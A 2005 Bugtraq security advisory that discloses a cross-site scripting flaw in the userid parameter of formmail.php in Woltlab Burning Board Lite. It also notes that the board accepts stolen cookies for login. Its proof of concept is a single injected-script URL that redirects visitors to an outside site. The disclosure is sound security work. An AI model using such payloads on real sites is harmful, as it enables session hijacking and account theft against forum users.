[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Security Advisory: Woltlab Burning Board Lite formmail.php XSS
From:       Martin Heistermann <martin.heistermann () web ! de>
Date:       2005-01-08 19:29:57
Message-ID: 20050108192957.25739.qmail () www ! securityfocus ! com
[Download RAW message or body]



Advisory Information
--------------------
Advisory name		:  Woltlab Burning Board Lite formmail.php XSS
Discovered by		:  drhankey / it-security23.net
Vendor Name		:  Woltlab
Vendor Homepage		:  http://www.woltlab.de
Software		:  Woltlab Burning Board Lite
Vulnerability Type	:  Cross-Site-Scripting
Vulnerable Versions	:  1.0.0, 1.0.1e, maybe more
Platforms		:  OS Independent, PHP


What is Woltlab Burning Board Lite?
----------------------------------
Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,
a PHP based bulletin board


Vulnerability Description:
-------------------------
formmail.php outputs the "userid"-parameter unfiltered, so its possible to add \
arbitary Code to the output by using a malformed link. The Board also allows logging \
in with stolen cookies.

Proof of Concept:
-----------------
http://website/board/formmail.php?userid=1">&lt;script&gt;document.location.href="http://www.it-security23.net";</script \
x="y


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic